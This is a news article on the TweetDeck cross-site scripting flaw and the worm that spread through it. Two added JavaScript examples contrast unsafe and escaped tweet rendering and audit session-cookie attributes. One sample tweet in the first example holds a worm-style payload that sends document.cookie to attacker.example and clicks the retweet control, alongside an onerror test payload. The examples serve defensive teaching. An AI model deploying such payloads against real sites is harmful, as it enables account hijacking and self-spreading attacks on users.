Twitter has been forced to suspend its TweetDeck client to investigate and fix a security flaw that could expose users to account hijack and other malicious activity.
The microblogging service took action after hackers began exploiting a cross-site scripting (XSS) vulnerability in TweetDeck version 3.7.1-19002e5.
TweetDeck – a UK firm Twitter bought for £25m in 2011 – allows users to collate different feeds.
The coding vulnerability has hit several high-profile accounts, including BBC Breaking News and that of Labour party leader Ed Miliband, reports the BBC.
Although most of these attacks have been harmless, the flaw can also be exploited to take over accounts, post tweets, and follow and unfollow people, the Guardian reported.
XSS threat to devices
Security firm Rapid7 said it had seen a “worm” that self-replicates by creating malicious tweets, affecting mainly users of the TweetDeck plugin for Google Chrome.
But the firm warned that one of the most common XSS attacks is used to steal the user’s session, enabling attackers to take over accounts.
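The worm Rapid7 describes works because tweet text is treated as markup by the client rather than as text. The following is an added example, not TweetDeck's or Twitter's code: a vulnerable rendering pattern (untrusted text interpolated into HTML) beside its hardened form (contextual escaping), run over a constructed sample feed that carries a generic worm-style payload. The placeholder host attacker.example and the `data-action=retweet` selector are assumptions for illustration only; the string-inspection check stands in for a real DOM render.

```javascript
// Added example (not TweetDeck's code): how tweet text becomes script when a
// client renders it as HTML, and how contextual output encoding neutralises it.

// Escape the characters that are significant in HTML text and attribute contexts.
function escapeHtml(s) {
  return String(s).replace(/[&<>"'\/]/g, (ch) => ({
    '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#x27;', '/': '&#x2F;'
  }[ch]));
}

// Vulnerable pattern: tweet fields interpolated straight into markup that is
// later assigned to innerHTML (or otherwise parsed as HTML). Any tag in the
// tweet text executes with the client's origin and the victim's session.
function renderTweetUnsafe(tweet) {
  return `<div class="tweet" data-id="${tweet.id}">` +
         `<span class="user">@${tweet.user}</span> ` +
         `<span class="text">${tweet.text}</span></div>`;
}

// Hardened pattern: every untrusted field is escaped for the context it lands in.
function renderTweetSafe(tweet) {
  return `<div class="tweet" data-id="${escapeHtml(tweet.id)}">` +
         `<span class="user">@${escapeHtml(tweet.user)}</span> ` +
         `<span class="text">${escapeHtml(tweet.text)}</span></div>`;
}

// Crude static check used only to show the difference: reports markup a
// browser would execute (script tags, inline event handlers, javascript: URLs).
// A real test would render in a DOM; this stand-in only inspects the string.
function findExecutableMarkup(html) {
  const findings = [];
  if (/<script\b/i.test(html)) findings.push('script-tag');
  if (/<[a-z][^>]*\son[a-z]+\s*=/i.test(html)) findings.push('event-handler');
  if (/(?:href|src)\s*=\s*["']?\s*javascript:/i.test(html)) findings.push('javascript-url');
  return findings;
}

// Constructed sample feed: a benign tweet, a worm-style payload that would
// (a) copy document.cookie to a placeholder host and (b) click the client's
// own retweet control to repost itself, and an event-handler payload.
const SAMPLE_FEED = [
  { id: '1', user: 'alice', text: 'Tom & Jerry <3 this client' },
  { id: '2', user: 'mallory',
    text: '<script>new Image().src="https://attacker.example/c?"+document.cookie;' +
          'document.querySelector("[data-action=retweet]").click()</script>' },
  { id: '3', user: 'eve', text: '<img src=x onerror="alert(1)">' },
];

// Render each tweet with the given renderer and report what would execute.
function auditFeed(feed, render) {
  return feed.map((t) => ({ id: t.id, issues: findExecutableMarkup(render(t)) }));
}

if (typeof require !== 'undefined' && require.main === module) {
  console.log('unsafe:', JSON.stringify(auditFeed(SAMPLE_FEED, renderTweetUnsafe)));
  console.log('safe:  ', JSON.stringify(auditFeed(SAMPLE_FEED, renderTweetSafe)));
}
```

With the unsafe renderer the audit flags tweets 2 and 3; with the escaped renderer it flags nothing, because the payload is now displayed as literal text. Escaping must match the context (an attribute, a URL or a script block each needs its own encoding), which is why the safe renderer escapes every field rather than only the visible text.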
The normal Twitter web interface, and other apps such as Echofon that use Twitter's API, do not seem to be affected, the Guardian reported.
TweetDeck was suspended temporarily after the first attempt to fix the problem failed.
Users were advised to log out and log back in to apply the initial fix, but some users who did so reported that the problem had not been solved.
George Anderson, director at security firm Webroot, said the possibility of running a script on a user’s device is what makes the XSS vulnerability so dangerous.
Risk to passwords
“The script can send any sensitive information accessible from within the browser back to the hacker, so an attacker can gain access to the user’s private information – such as passwords, usernames and card numbers,” he said.
Anderson said that signing out might help to contain the infection only if a user's device is not already infected.
“Because XSS steals the cookie sign-on information, users should get rid of all saved passwords, as well as sign in again on a secure browser session and change their log-ins,” he said.
“It could also potentially tweet as the user, thereby spreading itself. It could be as big as the Samy worm from MySpace,” he said.
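Whether injected script can copy the session cookie out of the browser depends on how that cookie was set. The following is an added example, not Twitter's or TweetDeck's configuration: a small Set-Cookie parser and an audit that reports the attributes which limit cookie theft, run over two constructed header values. It also records the caveat a practitioner would want: these attributes stop the token from being read, not script that is already running in the page from acting as the user, which is how the worm described above reposts itself.

```javascript
// Added example (constructed headers, not a real service's configuration):
// check whether a session cookie is set so that injected script cannot read it.

// Parse one Set-Cookie header value into name, value and a lower-cased attribute map.
function parseSetCookie(header) {
  const parts = header.split(';').map((p) => p.trim()).filter(Boolean);
  const [name, ...rest] = parts[0].split('=');
  const attrs = {};
  for (const p of parts.slice(1)) {
    const i = p.indexOf('=');
    const k = (i === -1 ? p : p.slice(0, i)).toLowerCase();
    attrs[k] = i === -1 ? true : p.slice(i + 1);
  }
  return { name: name.trim(), value: rest.join('='), attrs };
}

// Report the weaknesses that matter for XSS-driven session theft.
// HttpOnly keeps document.cookie from returning the value; Secure keeps it off
// plain HTTP; SameSite=Lax/Strict keeps it off most cross-site requests.
// None of these stops script already running in the page from issuing
// requests in the victim's session (retweeting, following), so output
// encoding is still the fix; these attributes only limit what is stolen.
function auditSessionCookie(header) {
  const c = parseSetCookie(header);
  const problems = [];
  if (!('httponly' in c.attrs)) problems.push('missing HttpOnly: readable via document.cookie');
  if (!('secure' in c.attrs)) problems.push('missing Secure: sent over plain HTTP');
  const ss = String(c.attrs.samesite || '').toLowerCase();
  if (ss !== 'lax' && ss !== 'strict') problems.push('SameSite not Lax/Strict: sent on cross-site requests');
  return { name: c.name, problems };
}

// Constructed headers: a weak session cookie beside a hardened one.
const WEAK_COOKIE = 'session=abc123; Path=/';
const HARDENED_COOKIE = 'session=abc123; Path=/; Secure; HttpOnly; SameSite=Lax';

if (typeof require !== 'undefined' && require.main === module) {
  console.log(auditSessionCookie(WEAK_COOKIE));
  console.log(auditSessionCookie(HARDENED_COOKIE));
}
```

Run against the weak header the audit lists three problems; against the hardened one it lists none. The exfiltration payload in a worm like this one reads document.cookie, which HttpOnly alone defeats, but the self-propagation step needs no cookie at all.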
In September 2010, attacks exploiting an XSS vulnerability hit Twitter, causing users to spread a message and annoy victims with pop-up windows.
Victims of the Twitter attack only had to move their mouse over the Twitter message, which then activated the malicious code.
Once activated, the message was reposted and viewable by the victim's followers, allowing it to quickly spread across the website, like a worm.
Pop-up windows led victims to third-party websites peddling porn, but Twitter assured users no user information was compromised.